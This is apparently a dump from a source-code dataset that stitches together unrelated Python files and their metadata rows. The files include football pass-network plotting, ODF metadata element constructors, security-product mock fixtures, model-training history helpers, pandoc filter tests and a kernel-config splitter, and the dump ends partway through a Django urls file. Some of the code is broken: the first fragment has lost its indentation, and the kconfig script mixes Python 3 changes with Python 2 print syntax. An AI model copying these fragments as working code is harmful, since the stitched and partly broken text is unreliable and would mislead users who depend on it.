# remove predictions which represent non-separable decision points (i.e., y_pred is equal)
if return_all == False:
res_df = res_df[(res_df.y_pred.duplicated('last') == False)]
return(res_df)
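# Usage sketch (not in the original file): calc_metrics() takes binary labels
# plus scores, and each returned row is one candidate decision threshold, e.g.:
# res = calc_metrics(y_true=[0, 0, 1, 1], y_pred=[0.1, 0.4, 0.35, 0.8])
# res[['y_pred', 'sens', 'spec', 'youdens_index']]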
def set_up_plot():
# plt.grid(True, 'major', color = 'w', linewidth = 0.7)
plt.grid(True, 'major', color = '0.85', linewidth = 0.7)
plt.grid(True, 'minor', color = "0.92", linestyle = '-', linewidth = 0.7)
ax = plt.gca()
plt.xlim([-0.05, 1.05])
plt.ylim([-0.05, 1.05])
ax.set_axisbelow(True)
# ax.patch.set_facecolor("0.85")
def train_val(RESULT_DIR, alldata, models, label = 'Label',
cv = 5,
score_name = "AUC",
to_exclude = None,
test_ind_col = None, oversample_rate = 1,
imputer = 'iterative', add_missing_flags = True):
from medical_ML import Experiment
print('\n\n' + 'STARTING EXPERIMENT FOR ' + RESULT_DIR + '\n\n')
expt = Experiment(alldata, label = label,
to_exclude = to_exclude,
test_ind_col = test_ind_col, drop = 'all',
result_dir = RESULT_DIR)
expt.predict_models_from_groups(0, models, cv=cv, score_name=score_name, mode='classification',
oversample_rate = oversample_rate,
imputer = imputer, add_missing_flags = add_missing_flags)
expt.save_and_plot_results(models,
cv = cv, test = False)
return(expt) | 48.821121 | 147 | 0.382201 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12,622 | 0.557189 |
4c6c5b767e3d2e7d380bed49701614a213de873b | 8,063 | py | Python | examples/plots/plot_pass_network.py | DymondFormation/mplsoccer | 544300857ec5936781e12fda203cf2df8a3d00b9 | [
"MIT"
] | null | null | null | examples/plots/plot_pass_network.py | DymondFormation/mplsoccer | 544300857ec5936781e12fda203cf2df8a3d00b9 | [
"MIT"
] | null | null | null | examples/plots/plot_pass_network.py | DymondFormation/mplsoccer | 544300857ec5936781e12fda203cf2df8a3d00b9 | [
"MIT"
] | null | null | null | """
============
Pass Network
============
This example shows how to plot passes between players in a set formation.
"""
import pandas as pd
from mplsoccer.pitch import Pitch
from matplotlib.colors import to_rgba
import numpy as np
from mplsoccer.statsbomb import read_event, EVENT_SLUG
##############################################################################
# Set team and match info, and get event and tactics dataframes for the defined match_id
match_id = 15946
team = 'Barcelona'
opponent = 'Alavés (A), 2018/19 La Liga'
event_dict = read_event(f'{EVENT_SLUG}/{match_id}.json', warn=False)
players = event_dict['tactics_lineup']
events = event_dict['event']
##############################################################################
# Adding on the last tactics id and formation for the team for each event
events.loc[events.tactics_formation.notnull(), 'tactics_id'] = events.loc[
events.tactics_formation.notnull(), 'id']
events[['tactics_id', 'tactics_formation']] = events.groupby('team_name')[[
'tactics_id', 'tactics_formation']].ffill()
##############################################################################
# Add the abbreviated player position to the players dataframe
formation_dict = {1: 'GK', 2: 'RB', 3: 'RCB', 4: 'CB', 5: 'LCB', 6: 'LB', 7: 'RWB',
8: 'LWB', 9: 'RDM', 10: 'CDM', 11: 'LDM', 12: 'RM', 13: 'RCM',
14: 'CM', 15: 'LCM', 16: 'LM', 17: 'RW', 18: 'RAM', 19: 'CAM',
20: 'LAM', 21: 'LW', 22: 'RCF', 23: 'ST', 24: 'LCF', 25: 'SS'}
players['position_abbreviation'] = players.player_position_id.map(formation_dict)
##############################################################################
# Add on the substitutions to the players dataframe, i.e. where players are subbed on
# but the formation doesn't change
sub = events.loc[events.type_name == 'Substitution',
['tactics_id', 'player_id', 'substitution_replacement_id',
'substitution_replacement_name']]
players_sub = players.merge(sub.rename({'tactics_id': 'id'}, axis='columns'),
on=['id', 'player_id'], how='inner', validate='1:1')
players_sub = (players_sub[['id', 'substitution_replacement_id', 'position_abbreviation']]
.rename({'substitution_replacement_id': 'player_id'}, axis='columns'))
players = pd.concat([players, players_sub])
players.rename({'id': 'tactics_id'}, axis='columns', inplace=True)
players = players[['tactics_id', 'player_id', 'position_abbreviation']]
##############################################################################
# Add player position information to the events dataframe
# add on the position the player was playing in the formation to the events dataframe
events = events.merge(players, on=['tactics_id', 'player_id'], how='left', validate='m:1')
# add on the position the recipient was playing in the formation to the events dataframe
events = events.merge(players.rename({'player_id': 'pass_recipient_id'},
axis='columns'), on=['tactics_id', 'pass_recipient_id'],
how='left', validate='m:1', suffixes=['', '_receipt'])
##############################################################################
# Create dataframes for passes and player locations
# get a dataframe with all passes
mask_pass = (events.team_name == team) & (events.type_name == 'Pass')
to_keep = ['id', 'match_id', 'player_id', 'player_name', 'outcome_name', 'pass_recipient_id',
'pass_recipient_name', 'x', 'y', 'end_x', 'end_y', 'tactics_id', 'tactics_formation',
'position_abbreviation', 'position_abbreviation_receipt']
passes = events.loc[mask_pass, to_keep].copy()
print('Formations used by {} in match: '.format(team), passes['tactics_formation'].unique())
##############################################################################
# Filter passes by chosen formation, then group all passes and receipts to
# calculate avg x, avg y, count of events for each slot in the formation
formation = 433
passes_formation = passes[(passes.tactics_formation == formation) &
(passes.position_abbreviation_receipt.notnull())].copy()
passer_passes = passes_formation[['position_abbreviation', 'x', 'y']].copy()
recipient_passes = passes_formation[['position_abbreviation_receipt', 'end_x', 'end_y']].copy()
# rename columns to match those in passer_passes
recipient_passes.rename({'position_abbreviation_receipt': 'position_abbreviation',
'end_x': 'x', 'end_y': 'y'}, axis='columns', inplace=True)
# create a new dataframe containing all individual passes and receipts from passes_formation
appended_passes = pd.concat(objs=[passer_passes, recipient_passes], ignore_index=True)
average_locs_and_count = appended_passes.groupby('position_abbreviation').agg({
'x': ['mean'], 'y': ['mean', 'count']})
average_locs_and_count.columns = ['x', 'y', 'count']
##############################################################################
# Group the passes by unique pairings of players and add the avg player positions to this dataframe
# calculate the number of passes between each position (using min/max so we get passes both ways)
passes_formation['pos_max'] = passes_formation[['position_abbreviation',
'position_abbreviation_receipt']].max(axis='columns')
passes_formation['pos_min'] = passes_formation[['position_abbreviation',
'position_abbreviation_receipt']].min(axis='columns')
passes_between = passes_formation.groupby(['pos_min', 'pos_max']).id.count().reset_index()
passes_between.rename({'id': 'pass_count'}, axis='columns', inplace=True)
# add on the location of each player so we have the start and end positions of the lines
passes_between = passes_between.merge(average_locs_and_count, left_on='pos_min', right_index=True)
passes_between = passes_between.merge(average_locs_and_count, left_on='pos_max', right_index=True,
suffixes=['', '_end'])
##############################################################################
# Calculate the line width and marker sizes relative to the largest counts
max_line_width = 18
max_marker_size = 3000
passes_between['width'] = passes_between.pass_count / passes_between.pass_count.max() * max_line_width
average_locs_and_count['marker_size'] = (average_locs_and_count['count']
/ average_locs_and_count['count'].max() * max_marker_size)
##############################################################################
# Set color to make the lines more transparent when fewer passes are made
min_transparency = 0.3
color = np.array(to_rgba('white'))
color = np.tile(color, (len(passes_between), 1))
c_transparency = passes_between.pass_count / passes_between.pass_count.max()
c_transparency = (c_transparency * (1 - min_transparency)) + min_transparency
color[:, 3] = c_transparency
##############################################################################
# Plotting
pitch = Pitch(pitch_type='statsbomb', orientation='horizontal',
pitch_color='#22312b', line_color='#c7d5cc', figsize=(16, 11),
constrained_layout=True, tight_layout=False)
fig, ax = pitch.draw()
pass_lines = pitch.lines(passes_between.x, passes_between.y,
passes_between.x_end, passes_between.y_end, lw=passes_between.width,
color=color, zorder=1, ax=ax)
pass_nodes = pitch.scatter(average_locs_and_count.x, average_locs_and_count.y, s=average_locs_and_count.marker_size,
color='red', edgecolors='black', linewidth=1, alpha=1, ax=ax)
for index, row in average_locs_and_count.iterrows():
pitch.annotate(row.name, xy=(row.x, row.y), c='white', va='center', ha='center', size=16, weight='bold', ax=ax)
title = ax.set_title("{} {} Formation vs {}".format(team, formation, opponent), size=28, y=0.97, color='#c7d5cc')
fig.set_facecolor("#22312b")
| 55.226027 | 116 | 0.615032 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,987 | 0.49442 |
d5b2899060598acf5361fb2c9db968e61435c9da | 2,181 | py | Python | env/lib/python3.6/site-packages/odf/meta.py | anthowen/duplify | 846d01c1b21230937fdf0281b0cf8c0b08a8c24e | [
"MIT"
] | 5,079 | 2015-01-01T03:39:46.000Z | 2022-03-31T07:38:22.000Z | env/lib/python3.6/site-packages/odf/meta.py | anthowen/duplify | 846d01c1b21230937fdf0281b0cf8c0b08a8c24e | [
"MIT"
] | 1,623 | 2015-01-01T08:06:24.000Z | 2022-03-30T19:48:52.000Z | env/lib/python3.6/site-packages/odf/meta.py | anthowen/duplify | 846d01c1b21230937fdf0281b0cf8c0b08a8c24e | [
"MIT"
] | 2,033 | 2015-01-04T07:18:02.000Z | 2022-03-28T19:55:47.000Z | # -*- coding: utf-8 -*-
# Copyright (C) 2006-2007 Søren Roug, European Environment Agency
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Contributor(s):
#
from odf.namespaces import METANS
from odf.element import Element
# Autogenerated
def AutoReload(**args):
return Element(qname = (METANS,'auto-reload'), **args)
def CreationDate(**args):
return Element(qname = (METANS,'creation-date'), **args)
def DateString(**args):
return Element(qname = (METANS,'date-string'), **args)
def DocumentStatistic(**args):
return Element(qname = (METANS,'document-statistic'), **args)
def EditingCycles(**args):
return Element(qname = (METANS,'editing-cycles'), **args)
def EditingDuration(**args):
return Element(qname = (METANS,'editing-duration'), **args)
def Generator(**args):
return Element(qname = (METANS,'generator'), **args)
def HyperlinkBehaviour(**args):
return Element(qname = (METANS,'hyperlink-behaviour'), **args)
def InitialCreator(**args):
return Element(qname = (METANS,'initial-creator'), **args)
def Keyword(**args):
return Element(qname = (METANS,'keyword'), **args)
def PrintDate(**args):
return Element(qname = (METANS,'print-date'), **args)
def PrintedBy(**args):
return Element(qname = (METANS,'printed-by'), **args)
def Template(**args):
args.setdefault('type', 'simple')
return Element(qname = (METANS,'template'), **args)
def UserDefined(**args):
return Element(qname = (METANS,'user-defined'), **args)
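# Usage sketch (assumption: odfpy's document API, which lives outside this
# file): these constructors are typically attached to a document's meta block.
# from odf.opendocument import OpenDocumentText
# doc = OpenDocumentText()
# doc.meta.addElement(Generator(text="my-exporter/1.0"))
# doc.save("out.odt")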
| 32.073529 | 80 | 0.707474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,054 | 0.483043 |
d5b2ddd3598b303bcb8230980f8ef5b2b4388ef0 | 5,712 | py | Python | src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py | fslds/carbon-black-cloud-sdk-python | 248a3c63d6b36d6fcdbcb3f51fb7751f062ed372 | [
"MIT"
] | 24 | 2020-10-16T22:07:38.000Z | 2022-03-24T14:58:03.000Z | src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py | fslds/carbon-black-cloud-sdk-python | 248a3c63d6b36d6fcdbcb3f51fb7751f062ed372 | [
"MIT"
] | 63 | 2020-10-26T18:26:15.000Z | 2022-03-31T17:31:02.000Z | src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py | fslds/carbon-black-cloud-sdk-python | 248a3c63d6b36d6fcdbcb3f51fb7751f062ed372 | [
"MIT"
] | 10 | 2020-11-09T11:54:23.000Z | 2022-03-24T20:44:00.000Z | """Mock responses for recommendations."""
SEARCH_REQ = {
"criteria": {
"policy_type": ['reputation_override'],
"status": ['NEW', 'REJECTED', 'ACCEPTED'],
"hashes": ['111', '222']
},
"rows": 50,
"sort": [
{
"field": "impact_score",
"order": "DESC"
}
]
}
SEARCH_RESP = {
"results": [
{
"recommendation_id": "91e9158f-23cc-47fd-af7f-8f56e2206523",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "32d2be78c00056b577295aa0943d97a5c5a0be357183fcd714c7f5036e4bdede",
"filename": "XprotectService",
"application": {
"type": "EXE",
"value": "FOO"
}
},
"workflow": {
"status": "NEW",
"changed_by": "rbaratheon@example.com",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T20:53:39.000Z",
"comment": "Ours is the fury"
},
"impact": {
"org_adoption": "LOW",
"impacted_devices": 45,
"event_count": 76,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
},
{
"recommendation_id": "bd50c2b2-5403-4e9e-8863-9991f70df026",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "0bbc082cd8b3ff62898ad80a57cb5e1f379e3fcfa48fa2f9858901eb0c220dc0",
"filename": "sophos ui.msi"
},
"workflow": {
"status": "NEW",
"changed_by": "tlannister@example.com",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T20:53:09.000Z",
"comment": "Always pay your debts"
},
"impact": {
"org_adoption": "HIGH",
"impacted_devices": 8,
"event_count": 25,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
},
{
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 7.8.0.125 (x86).msi"
},
"workflow": {
"status": "NEW",
"changed_by": "estark@example.com",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
],
"num_found": 3
}
ACTION_INIT = {
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 7.8.0.125 (x86).msi"
},
"workflow": {
"status": "NEW",
"changed_by": "estark@example.com",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
ACTION_REQS = [
{
"action": "ACCEPT",
"comment": "Alpha"
},
{
"action": "RESET"
},
{
"action": "REJECT",
"comment": "Charlie"
},
]
ACTION_REFRESH_SEARCH = {
"criteria": {
"status": ['NEW', 'REJECTED', 'ACCEPTED'],
"policy_type": ['reputation_override']
},
"rows": 50
}
ACTION_SEARCH_RESP = {
"results": [ACTION_INIT],
"num_found": 1
}
ACTION_REFRESH_STATUS = ['ACCEPTED', 'NEW', 'REJECTED']
ACTION_INIT_ACCEPTED = {
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 7.8.0.125 (x86).msi"
},
"workflow": {
"status": "ACCEPTED",
"ref_id": "e9410b754ea011ebbfd0db2585a41b07",
"changed_by": "estark@example.com",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
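if __name__ == "__main__":
    # Lightweight self-check (not part of the original fixtures): each mocked
    # search response should report as many hits as it actually carries.
    assert SEARCH_RESP["num_found"] == len(SEARCH_RESP["results"])
    assert ACTION_SEARCH_RESP["num_found"] == len(ACTION_SEARCH_RESP["results"])
    print("mock fixtures are internally consistent")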
| 31.043478 | 98 | 0.500525 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,275 | 0.573354 |
d5b58f8a34e9535374ceecc69e4b47358c97ddb9 | 1,395 | py | Python | flametree/utils.py | Edinburgh-Genome-Foundry/Flametree | a189de5d83ca1eb3526a439320e41df9e2a1162e | [
"MIT"
] | 165 | 2017-02-04T00:40:01.000Z | 2021-06-08T03:51:58.000Z | flametree/utils.py | Edinburgh-Genome-Foundry/Flametree | a189de5d83ca1eb3526a439320e41df9e2a1162e | [
"MIT"
] | 8 | 2017-02-10T00:47:09.000Z | 2021-05-30T04:38:41.000Z | flametree/utils.py | Edinburgh-Genome-Foundry/Flametree | a189de5d83ca1eb3526a439320e41df9e2a1162e | [
"MIT"
] | 19 | 2017-02-09T17:38:31.000Z | 2021-03-23T16:04:32.000Z | import os
import shutil
from .ZipFileManager import ZipFileManager
from .DiskFileManager import DiskFileManager
from .Directory import Directory
import string
printable = set(string.printable) - set("\x0b\x0c")
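# Note: despite its name, is_hex() is a "looks binary" heuristic -- it flags
# strings holding characters outside the printable set (e.g. raw zip bytes).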
def is_hex(s):
return any(c not in printable for c in s)
def file_tree(target, replace=False):
"""Open a connection to a file tree which can be either a disk folder, a
zip archive, or an in-memory zip archive.
Parameters
----------
target
Either the path to a target folder, or a zip file, or '@memory' to write
      a zip file in memory (in which case a string of the zip file is returned)
If the target is already a flametree directory, it is returned as-is.
replace
If True, will remove the target if it already exists. If False, new files
will be written inside the target and some files may be overwritten.
"""
if isinstance(target, Directory):
return target
if (not isinstance(target, str)) or is_hex(target):
return Directory(file_manager=ZipFileManager(source=target))
elif target == "@memory":
return Directory("@memory", file_manager=ZipFileManager("@memory"))
elif target.lower().endswith(".zip"):
return Directory(target, file_manager=ZipFileManager(target, replace=replace))
else:
return Directory(target, file_manager=DiskFileManager(target))
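if __name__ == "__main__":
    # Dispatch sketch (not part of the original module): is_hex() is what
    # routes raw zip data, as opposed to paths, to an in-memory ZipFileManager.
    print(is_hex("plain/folder/path"))  # False -> handled as a path
    print(is_hex("PK\x03\x04"))         # True  -> zip magic bytes, binary data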
| 32.44186 | 86 | 0.703226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 615 | 0.44086 |
d5bd90ba6b204f06ed13dd7eaecdd9ec577e33cb | 5,512 | py | Python | src/models/utils_func.py | Soufiane-Fartit/cars-prices | 8eee8aa168251adab7f4947c45a78752e4145041 | [
"MIT"
] | null | null | null | src/models/utils_func.py | Soufiane-Fartit/cars-prices | 8eee8aa168251adab7f4947c45a78752e4145041 | [
"MIT"
] | null | null | null | src/models/utils_func.py | Soufiane-Fartit/cars-prices | 8eee8aa168251adab7f4947c45a78752e4145041 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
""" This module offers util functions to be called and used
in other modules
"""
from datetime import datetime
import os
import json
import pickle
import string
import random
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sns
from sklearn import tree
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
"""GENERATE A RANDOM STRING TO BE USED AS AN ID
Args:
size (int, optional): size of the string. Defaults to 6.
        chars (str, optional): characters to be used to generate the string.
Defaults to string.ascii_lowercase+string.digits.
Returns:
        [str]: a random chain of characters
"""
return "".join(random.choice(chars) for _ in range(size))
def save_model(path, model):
"""SAVE MODEL INTO PICKLE FILE
Args:
path (str): path where to save the model
model (binary): the model to be saved
"""
with open(path, "wb") as file:
pickle.dump(model, file)
def update_history(models_hist_path, model_id, model_name, model, params):
"""SAVE METADATA RELATED TO THE TRAINED MODEL INTO THE HISTORY FILE
Args:
models_hist_path (str): path to the history file
model_id (str): unique id of the model
model_name (str): model name = "model_"+model_id+".pkl"
model (binary): binary file of the model
params (dict): dictionnary containing the hyper-parameters
used to fit the model
"""
model_metadata = dict()
model_metadata["trained"] = str(datetime.now())
model_metadata["model_type"] = type(model).__name__
model_metadata["model_id"] = model_id
model_metadata["params"] = params
print(model_metadata)
with open(models_hist_path, "r+") as outfile:
try:
hist = json.load(outfile)
hist[model_name] = model_metadata
outfile.seek(0)
json.dump(hist, outfile, indent=4)
except json.decoder.JSONDecodeError:
json.dump({model_name: model_metadata}, outfile, indent=4)
def update_history_add_eval(
models_hist_path, model_id=None, model_name=None, metrics=None
):
"""ADD EVALUATION METRICS THE HISTORY FILE FOR THE SPECIFIED MODEL
Args:
models_hist_path (str): path to the history file
model_id (str, optional): the id of the model. Defaults to None.
model_name (str, optional): the name of the model. Defaults to None.
metrics (dict, optional): a dictionnary containing metadata related
to the model evaluation. Defaults to None.
"""
assert (
model_id is not None or model_name is not None
), "At least the model id or name must be given"
assert models_hist_path is not None, "You must specify the path to the history file"
if not model_name:
model_name = "model_" + model_id + ".pkl"
eval_metadata = dict()
eval_metadata["datetime"] = str(datetime.now())
eval_metadata["metrics"] = metrics
with open(models_hist_path, "r+") as outfile:
try:
hist = json.load(outfile)
hist[model_name]["evaluation"] = eval_metadata
outfile.seek(0)
json.dump(hist, outfile, indent=4)
except json.decoder.JSONDecodeError:
print("cannot save evaluation metadata")
def generate_features_importance_plot(model, features, model_id):
"""GENERATES A PLOT DESCRIBING FEATURES IMPORTANCE FOR THE MODEL
TO MAKE THE PREDICTION.
Args:
model (tree-based model): a tree based model (decision tree, random forest ...)
features (pandas dataframe): a table of the features on which we trained the model
model_id (str): the unique id of the model
"""
mean_importances = model.feature_importances_
importances_indices = np.argsort(mean_importances)[::-1]
ordered_columns = [features.columns[i] for i in importances_indices]
importances = pd.DataFrame(
        [est.feature_importances_ for est in model.estimators_],  # 'est' avoids shadowing the imported sklearn 'tree' module
columns=features.columns,
)
importances = importances[ordered_columns]
_, ax = plt.subplots(figsize=(12, 8))
sns.boxplot(x="variable", y="value", ax=ax, data=pd.melt(importances))
figure = ax.get_figure()
figure.savefig(
"models/models-training/run_" + model_id + "/features_importance.png"
)
def plot_trees(rf, feature_names, target_names, model_id):
"""GENERATES A PLOT THAT SHOWS THE DECISION MAKING OF THE TREES
Args:
rf (model): a tree based model (random forest ...)
feature_names (list): names of the columns of the training set
target_names (str): name of the target columns
model_id (str): unique id of the model
"""
fn = feature_names
cn = target_names
fig, axes = plt.subplots(nrows=1, ncols=5, figsize=(10, 2), dpi=900)
for index in range(0, 5):
tree.plot_tree(
rf.estimators_[index],
feature_names=fn,
class_names=cn,
filled=True,
ax=axes[index],
)
axes[index].set_title("Estimator: " + str(index), fontsize=11)
fig.savefig("models/models-training/run_" + model_id + "/Trees.png")
def get_id_list(N=6):
    print(os.getcwd())
print([x[0] for x in os.walk("../../models/models-training")])
return [x[0][-N:] for x in os.walk("../../models/models-training")][1:] | 33.815951 | 90 | 0.649492 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,524 | 0.45791 |
d5c9c3dcfd93144a733bdffa2a7d7a7dc364d51d | 2,807 | py | Python | tests/test_html_escaping.py | copart/pandoc-mustache | f6ace29cd0c8d6b4d8f182eedcf36ad38a2412fa | [
"CC0-1.0"
] | 43 | 2017-12-27T05:57:00.000Z | 2022-03-18T10:07:28.000Z | tests/test_html_escaping.py | copart/pandoc-mustache | f6ace29cd0c8d6b4d8f182eedcf36ad38a2412fa | [
"CC0-1.0"
] | 10 | 2018-02-07T11:20:37.000Z | 2021-04-22T21:44:19.000Z | tests/test_html_escaping.py | copart/pandoc-mustache | f6ace29cd0c8d6b4d8f182eedcf36ad38a2412fa | [
"CC0-1.0"
] | 8 | 2018-11-05T13:10:35.000Z | 2021-08-30T18:14:02.000Z | """
Test that escaping characters for HTML is disabled.
"""
import os, subprocess
def test_escape_singlequote(tmpdir):
# Define empty dictionaries
doc = {}
template = {}
# Prepare file names
doc['path'] = tmpdir.join("document.md")
template['path'] = tmpdir.join("template.yaml")
# Prepare file contents
doc['metadata'] = '''---
mustache: {mustachefile}
---
'''
doc['mfiles'] = { "mustachefile": template['path'] }
doc['text'] = 'Hello {{place}}'
template['content'] = "place: world ' universe"
# Write contents to files
with open(doc['path'].strpath, "a") as myfile:
myfile.write(doc['metadata'].format(**doc['mfiles']))
myfile.write(doc['text'])
template['path'].write(template['content'])
# Run pandoc
output = subprocess.check_output(["pandoc", doc['path'].strpath, "--filter", "pandoc-mustache", "--to=plain"], universal_newlines=True)
# Test output
assert output == "Hello world ' universe\n"
def test_escape_gt(tmpdir):
# Define empty dictionaries
doc = {}
template = {}
# Prepare file names
doc['path'] = tmpdir.join("document.md")
template['path'] = tmpdir.join("template.yaml")
# Prepare file contents
doc['metadata'] = '''---
mustache: {mustachefile}
---
'''
doc['mfiles'] = { "mustachefile": template['path'] }
doc['text'] = 'Hello {{place}}'
template['content'] = "place: world > universe"
# Write contents to files
with open(doc['path'].strpath, "a") as myfile:
myfile.write(doc['metadata'].format(**doc['mfiles']))
myfile.write(doc['text'])
template['path'].write(template['content'])
# Run pandoc
output = subprocess.check_output(["pandoc", doc['path'].strpath, "--filter", "pandoc-mustache", "--to=plain"], universal_newlines=True)
# Test output
assert output == "Hello world > universe\n"
def test_escape_ampersand(tmpdir):
# Define empty dictionaries
doc = {}
template = {}
# Prepare file names
doc['path'] = tmpdir.join("document.md")
template['path'] = tmpdir.join("template.yaml")
# Prepare file contents
doc['metadata'] = '''---
mustache: {mustachefile}
---
'''
doc['mfiles'] = { "mustachefile": template['path'] }
doc['text'] = 'Hello {{place}}'
template['content'] = "place: world & universe"
# Write contents to files
with open(doc['path'].strpath, "a") as myfile:
myfile.write(doc['metadata'].format(**doc['mfiles']))
myfile.write(doc['text'])
template['path'].write(template['content'])
# Run pandoc
output = subprocess.check_output(["pandoc", doc['path'].strpath, "--filter", "pandoc-mustache", "--to=plain"], universal_newlines=True)
# Test output
assert output == "Hello world & universe\n"
| 28.642857 | 139 | 0.617385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,322 | 0.470965 |
d5cee84d7663e55b77b23428667b37ccfb80fbf9 | 1,253 | py | Python | scripts/kconfig-split.py | Osirium/linuxkit | b710224cdf9a8425a7129cdcb84fc1af00f926d7 | [
"Apache-2.0"
] | 7,798 | 2017-04-18T15:19:24.000Z | 2022-03-30T19:34:42.000Z | scripts/kconfig-split.py | Osirium/linuxkit | b710224cdf9a8425a7129cdcb84fc1af00f926d7 | [
"Apache-2.0"
] | 1,673 | 2017-04-18T16:15:20.000Z | 2022-03-31T06:14:17.000Z | scripts/kconfig-split.py | Osirium/linuxkit | b710224cdf9a8425a7129cdcb84fc1af00f926d7 | [
"Apache-2.0"
] | 1,099 | 2017-04-18T15:19:33.000Z | 2022-03-31T20:23:20.000Z | #!/usr/bin/env python
# This is a slightly modified version of ChromiumOS' splitconfig
# https://chromium.googlesource.com/chromiumos/third_party/kernel/+/stabilize-5899.B-chromeos-3.14/chromeos/scripts/splitconfig
"""See this page for more details:
http://dev.chromium.org/chromium-os/how-tos-and-troubleshooting/kernel-configuration
"""
import os
import re
import sys
allconfigs = {}
# Parse config files
for config in sys.argv[1:]:
allconfigs[config] = set()
for line in open(config):
m = re.match("#*\s*CONFIG_(\w+)[\s=](.*)$", line)
if not m:
continue
option, value = m.groups()
allconfigs[config].add((option, value))
# Split out common config options
common = next(iter(allconfigs.values())).copy()  # py3: dict views are not indexable
for config in allconfigs.keys():
common &= allconfigs[config]
for config in allconfigs.keys():
allconfigs[config] -= common
allconfigs["common"] = common
# Generate new splitconfigs
for config in allconfigs.keys():
f = open("split-" + config, "w")
for option, value in sorted(list(allconfigs[config])):
if value == "is not set":
print >>f, "# CONFIG_%s %s" % (option, value)
else:
print >>f, "CONFIG_%s=%s" % (option, value)
f.close()
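# Example (sketch): `./kconfig-split.py config-a config-b` writes split-common
# (options shared by both inputs) plus split-config-a and split-config-b,
# which hold only the options that differ from that shared baseline.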
| 27.844444 | 127 | 0.651237 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 505 | 0.403033 |
d5d20f7a81be3ee7ffae45e074584da66ec78259 | 210 | py | Python | multistream_select/__init__.py | Projjol/py-multistream-select | 624becaaeefa0a76d6841e27fbf7dea3240d2fe0 | [
"MIT"
] | null | null | null | multistream_select/__init__.py | Projjol/py-multistream-select | 624becaaeefa0a76d6841e27fbf7dea3240d2fe0 | [
"MIT"
] | null | null | null | multistream_select/__init__.py | Projjol/py-multistream-select | 624becaaeefa0a76d6841e27fbf7dea3240d2fe0 | [
"MIT"
] | null | null | null | __version__ = '0.1.0'
__all__ = ['MultiStreamSelect', 'hexify']
__author__ = 'Natnael Getahun (connect@ngetahun.me)'
__name__ = 'multistream'
from .multistream import MultiStreamSelect
from .utils import hexify
| 26.25 | 52 | 0.766667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 86 | 0.409524 |
d5e8cedec4a5704ab1636f88d9b806e93b86ff8a | 1,186 | py | Python | userManagement/management/urls.py | shubhamguptaorg/user_managementl | ad98e0e4886d9b0547b05ae424c10d8f6268d470 | [
"MIT"
] | null | null | null | userManagement/management/urls.py | shubhamguptaorg/user_managementl | ad98e0e4886d9b0547b05ae424c10d8f6268d470 | [
"MIT"
] | 4 | 2021-03-19T03:22:44.000Z | 2022-03-11T23:58:10.000Z | userManagement/management/urls.py | shubhamguptaorg/user_managementl | ad98e0e4886d9b0547b05ae424c10d8f6268d470 | [
"MIT"
] | null | null | null | from django.contrib import admin
from django.urls import path,include
from django.views.generic import TemplateView
